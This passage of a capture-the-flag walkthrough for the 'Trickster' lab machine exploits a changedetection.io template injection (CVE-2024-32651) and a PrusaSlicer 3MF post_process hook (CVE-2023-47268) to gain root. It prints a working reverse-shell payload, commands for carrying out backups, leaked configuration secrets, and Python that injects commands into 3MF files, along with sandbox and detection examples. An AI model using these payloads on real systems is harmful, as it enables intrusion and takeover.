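    print(f"listener on {listener_port}, scan found {found}")
```

The timeout is the important part: a connect scan against a host behind a firewall that drops instead of rejecting would otherwise wait tens of seconds per port.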
Pillaging - Port 5000
Curling port 5000 shows changedetection.io; the stylesheet query string (styles.css?v=0.45.20) gives the version, 0.45.20.
james@trickster:~$ curl -L http://172.17.0.2:5000
<!DOCTYPE html>
<html lang="en" data-darkmode="false">
<head>
<meta charset="utf-8" >
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<meta name="description" content="Self hosted website change detection." >
<title>Change Detection</title>
<link rel="alternate" type="application/rss+xml" title="Changedetection.io » Feed" href="/rss?tag=&token=" >
<link rel="stylesheet" href="/static/styles/pure-min.css" >
<link rel="stylesheet" href="/static/styles/styles.css?v=0.45.20" >
----- SNIP -----
Forward port 5000 to the local machine over SSH.
ssh -L 5000:172.17.0.2:5000 james@10.10.11.34
james@10.10.11.34's password:
Last login: Mon Feb 3 01:02:16 2025 from 10.10.16.19
james@trickster:~$
The changedetection.io login page asks only for a password. james's password is reused here and grants access.
Shell - Docker Container [ root - CVE-2024-32651 changedetection SSTI ]
changedetection.io is an open-source web page change detection, website watcher, restock monitor and notification service; its source code and documentation are in this GitHub repository. Versions <= 0.45.20 are vulnerable to CVE-2024-32651, a server-side template injection: the notification body is rendered as a Jinja2 template, so a logged-in user can walk from the template object to Python's builtins and execute commands. More details and a PoC are found here.
Following that PoC with the payload below (replace the IP and port with your listener) gives a root shell in the Docker container, since the service runs as root there.
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "bash -i >& /dev/tcp/10.10.16.19/8443 0>&1"').read() }}
Settings > Notifications > paste the payload into the notification body > click "Send test notification"
nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.34 53796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@a4b9a36ae7ff:/app#
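Why the payload works and what stops it, as an added example that is not code from changedetection.io or from the PoC: the same dunder walk is rendered in a plain Jinja2 Environment (the vulnerable pattern) and in Jinja2's ImmutableSandboxedEnvironment, which refuses attribute names that start with an underscore. The reverse shell is replaced by a harmless echo, and the jinja2 package is assumed to be installed.

```python
"""Jinja2 SSTI: the payload in a plain Environment versus the sandbox.

Added example; the harmless `echo` stands in for the write-up's reverse shell.
"""
try:
    from jinja2 import Environment
    from jinja2.sandbox import ImmutableSandboxedEnvironment, SecurityError
    HAVE_JINJA2 = True
except ImportError:
    HAVE_JINJA2 = False

# Same technique as the write-up's payload, command substituted.
PAYLOAD = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('echo ssti-ok').read() }}"
)


def render_unsafe(template_source):
    """Vulnerable pattern: user-controlled template text in a plain Environment.

    `self` is the TemplateReference; its __init__ exposes the jinja2.runtime
    module globals, whose __builtins__ dict holds __import__.
    """
    return Environment().from_string(template_source).render().strip()


def render_sandboxed(template_source):
    """Hardened pattern: same text, sandboxed environment.

    Returns the rendered text, or 'blocked' when the sandbox rejects an
    unsafe attribute access (anything starting with an underscore).
    """
    env = ImmutableSandboxedEnvironment()
    try:
        return env.from_string(template_source).render().strip()
    except SecurityError:
        return "blocked"


if __name__ == "__main__":
    if HAVE_JINJA2:
        print("plain Environment    :", render_unsafe(PAYLOAD))
        print("sandboxed Environment:", render_sandboxed(PAYLOAD))
        print("benign template      :", render_sandboxed("{{ 'watch' ~ ' changed' }}"))
    else:
        print("jinja2 is not installed")
```

The sandbox still renders ordinary notification templating (the benign example), so it is the right fix for a feature like this: it removes the object walk, not the templating.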
Pillaging - root [ user - Docker Container ]
Enumerating /datastore finds a Backups directory containing two zip files.
root@a4b9a36ae7ff:/app# cd /datastore
cd /datastore
root@a4b9a36ae7ff:/datastore# ls
ls
Backups
b86f1003-3ecb-4125-b090-27e15ca605b9
bbdd78f6-db98-45eb-9e7b-681a0c60ea34
secret.txt
url-list-with-tags.txt
url-list.txt
url-watches.json
root@a4b9a36ae7ff:/datastore# cd Backups
cd Backups
root@a4b9a36ae7ff:/datastore/Backups# ls
ls
changedetection-backup-20240830194841.zip
changedetection-backup-20240830202524.zip
root@a4b9a36ae7ff:/datastore/Backups#
Neither nc nor unzip is present in the container.
Shell - adam
So tar is used to bundle the Backups directory and base64 to encode it for copy-paste exfiltration through the shell.
root@ae5c137aa8ef:/datastore/Backups# cd ..
cd ..
root@ae5c137aa8ef:/# tar czf datastore.tar.gz Backups/
tar czf datastore.tar.gz Backups/
root@a4b9a36ae7ff:/datastore# base64 datastore.tar.gz -w0
base64 datastore.tar.gz -w0
Copy the base64 output, save it to a file on your local machine, then decode it and extract the tarball.
base64 -d backup > backups.tar.gz
tar -xvf backups.tar.gz
Backups/
Backups/changedetection-backup-20240830202524.zip
Backups/changedetection-backup-20240830194841.zip
Change into the Backups directory; unzipping the first file reveals a Brotli-compressed .br snapshot alongside the watch's history and the exported URL lists.
cd Backups
unzip changedetection-backup-20240830194841.zip
Archive: changedetection-backup-20240830194841.zip
creating: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/
extracting: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
extracting: b4a8b52d-651b-44bc-bbc6-f9e8c6590103/history.txt
inflating: secret.txt
inflating: url-list.txt
inflating: url-list-with-tags.txt
inflating: url-watches.json
The brotli command decompresses the .br file (apt install brotli if it is missing). The snapshot turns out to be the text of a Gitea page: an older parameters.php in james's prestashop repository, committed with adam's credentials.
cd b4a8b52d-651b-44bc-bbc6-f9e8c6590103
brotli -d f04f0732f120c0cc84a993ad99decb2c.txt.br
cat f04f0732f120c0cc84a993ad99decb2c.txt
This website requires JavaScript.
Explore Help
Register Sign In
james/prestashop
Watch 1
Star 0
Fork 0
You've already forked prestashop
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
prestashop / app / config / parameters.php
james 8ee5eaf0bb prestashop
2024-08-30 20:35:25 +01:00
64 lines
3.1 KiB
PHP
Raw Permalink Blame History
< ? php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1' ,
'database_port' => '' ,
'database_name' => 'prestashop' ,
'database_user' => 'adam' ,
'database_password' => '' ,
'database_prefix' => 'ps_' ,
'database_engine' => 'InnoDB' ,
'mailer_transport' => 'smtp' ,
'mailer_host' => '127.0.0.1' ,
'mailer_user' => NULL ,
'mailer_password' => NULL ,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog' ,
'ps_caching' => 'CacheMemcache' ,
'ps_cache_enable' => false ,
'ps_creation_date' => '2024-05-25' ,
'locale' => 'en-US' ,
'use_debug_toolbar' => true ,
'cookie_key' => '8PR6s1SCD3cLk5GpvkGAZ4K9hMXpx2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i' ,
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g' ,
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03fbb7f2fb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47' ,
'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2meozijOIJFPFPkpoFKPdVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
' ,
'api_private_key' => '-----BEGIN PRIVATE KEY-----
----- SNIP -----
-----END PRIVATE KEY-----
' ,
),
);
Reference in New Issue View Git Blame Copy Permalink
Powered by Gitea Version: 1.22.1 Page: 158ms Template: 14ms
English
Bahasa Indonesia Deutsch English Español Français Italiano Latviešu Magyar nyelv Nederlands Polski Português de Portugal Português do Brasil Suomi Svenska Türkçe Čeština Ελληνικά Български Русский Українська فارسی മലയാളം 日本語 简体中文 繁體中文(台灣) 繁體中文(香港) 한국어
Licenses API%
Use those credentials to SSH in as adam.
ssh adam@10.10.11.34
adam@10.10.11.34's password:
adam@trickster:~$
Privilege Escalation
Pillaging - adam [ user ]
sudo -l shows adam may run /opt/PrusaSlicer/prusaslicer as root without a password.
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
adam@trickster:~$
/opt/PrusaSlicer contains two files: the prusaslicer binary and a project file, TRICKSTER.3mf.
adam@trickster:~$ cd /opt/PrusaSlicer
adam@trickster:/opt/PrusaSlicer$ ls
prusaslicer TRICKSTER.3mf
adam@trickster:/opt/PrusaSlicer$
PrusaSlicer is a popular slicer for FFF (Fused Filament Fabrication) and mSLA (masked Stereolithography) 3D printers. This build is vulnerable to CVE-2023-47268, arbitrary code execution through crafted 3MF project files: a 3MF is a zip archive whose Metadata/Slic3r_PE.config can carry a post_process setting, a shell command PrusaSlicer runs on the exported G-code, and because of the sudo rule that command runs as root here. Exploit-DB has a PoC for this vulnerability.
Shell - root [ CVE-2023-47268 Exploit ]
Copy TRICKSTER.3mf to your local machine; it is owned by root, so it cannot be edited in place.
adam@trickster:/opt/PrusaSlicer$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
wget http://10.10.11.34:8000/TRICKSTER.3mf
--2025-02-03 01:35:54-- http://10.10.11.34:8000/TRICKSTER.3mf
Connecting to 10.10.11.34:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 138526 (135K) [application/vnd.ms-3mfdocument]
Saving to: ‘TRICKSTER.3mf’
TRICKSTER.3mf 100%[========================================================================================>] 135.28K 37.6KB/s in 3.6s
2025-02-03 01:35:59 (37.6 KB/s) - ‘TRICKSTER.3mf’ saved [138526/138526]
List the archive and extract Metadata/Slic3r_PE.config (a 3MF file is a zip).
unzip -l TRICKSTER.3mf
Archive: TRICKSTER.3mf
Length Date Time Name
--------- ---------- ----- ----
375 2024-05-23 23:08 [Content_Types].xml
38098 2024-05-23 23:08 Metadata/thumbnail.png
411 2024-05-23 23:08 _rels/.rels
549577 2024-05-23 23:08 3D/3dmodel.model
13624 2024-05-23 23:08 Metadata/Slic3r_PE.config
3414 2024-05-23 23:08 Metadata/Slic3r_PE_model.config
--------- -------
605499 6 files
unzip TRICKSTER.3mf Metadata/Slic3r_PE.config
Archive: TRICKSTER.3mf
inflating: Metadata/Slic3r_PE.config
Set post_process to a command that makes /bin/bash SUID root, then write the modified config back into the archive. zip warns that the existing entry's local-header CRC does not match the central directory; it rewrites the member anyway and the archive still slices.
sed -i "s#; post_process =.*#; post_process = /usr/bin/chmod u+s /bin/bash#" Metadata/Slic3r_PE.config
zip -u TRICKSTER.3mf Metadata/Slic3r_PE.config
updating: Metadata/Slic3r_PE.config
zip warning: Local Entry CRC does not match CD: Metadata/Slic3r_PE.config
(deflated 69%)
Upload the modified TRICKSTER.3mf and slice it with an output file name (-o); without one prusaslicer errors out. When the G-code export finishes, the post_process command runs as root, after which /bin/bash -p gives a root shell (-p keeps the SUID-granted effective uid).
scp TRICKSTER.3mf adam@10.10.11.34:/home/adam
adam@10.10.11.34's password:
TRICKSTER.3mf 100% 135KB 24.1KB/s 00:05
sudo /opt/PrusaSlicer/prusaslicer -s TRICKSTER.3mf -o test
10 => Processing triangulated mesh
10 => Processing triangulated mesh
20 => Generating perimeters
----- SNIP -----
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to test
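The sed and zip -u steps above can be done in one pass that rewrites the archive cleanly, and the same parsing gives a defender a pre-slice check. The following Python is an added example, not the Exploit-DB PoC and not PrusaSlicer code: it builds a small stand-in 3MF inline (constructed, with only the members the technique touches), injects a post_process value, and lists every post_process command a project carries. The injected command is the write-up's chmod.

```python
"""Inject and detect a post_process hook in a 3MF project (CVE-2023-47268).

Added example; the sample archive is constructed, not TRICKSTER.3mf.
"""
import io
import re
import zipfile

CONFIG_MEMBER = "Metadata/Slic3r_PE.config"
_POST_PROCESS = re.compile(r"^; post_process = (.*)$", re.M)


def build_sample_3mf():
    """Constructed stand-in for TRICKSTER.3mf: only the members the exploit touches."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("3D/3dmodel.model", "<model/>")
        z.writestr(CONFIG_MEMBER,
                   "; generated by PrusaSlicer\n"
                   "; layer_height = 0.2\n"
                   "; post_process = \n"
                   "; skirts = 1\n")
    return buf.getvalue()


def set_post_process(threemf_bytes, command):
    """Return a new 3MF with post_process set to `command`; other members copied as-is.

    Rewriting every member gives consistent local and central-directory CRCs,
    which is what `zip -u` warned about on the original archive.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(threemf_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info)
            if info.filename == CONFIG_MEMBER:
                cfg = data.decode()
                if _POST_PROCESS.search(cfg):
                    cfg = _POST_PROCESS.sub(lambda m: f"; post_process = {command}", cfg)
                else:                                   # key absent: append it
                    cfg += f"; post_process = {command}\n"
                data = cfg.encode()
            dst.writestr(info.filename, data)
    return out.getvalue()


def post_process_commands(threemf_bytes):
    """Defender-side check: every non-empty post_process value in the project."""
    with zipfile.ZipFile(io.BytesIO(threemf_bytes)) as z:
        if CONFIG_MEMBER not in z.namelist():
            return []
        cfg = z.read(CONFIG_MEMBER).decode(errors="replace")
    return [v.strip() for v in _POST_PROCESS.findall(cfg) if v.strip()]


def archive_is_consistent(threemf_bytes):
    """True when every member's stored CRC matches its data."""
    with zipfile.ZipFile(io.BytesIO(threemf_bytes)) as z:
        return z.testzip() is None


if __name__ == "__main__":
    original = build_sample_3mf()
    weaponised = set_post_process(original, "/usr/bin/chmod u+s /bin/bash")
    print("before:", post_process_commands(original))
    print("after :", post_process_commands(weaponised))
    print("archive consistent:", archive_is_consistent(weaponised))
```

Anything that slices untrusted projects with elevated privileges should refuse a file for which post_process_commands returns a non-empty list; a project file has no business carrying a shell command.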
Proof of Concept
The video below provides a PoC for the Trickster machine.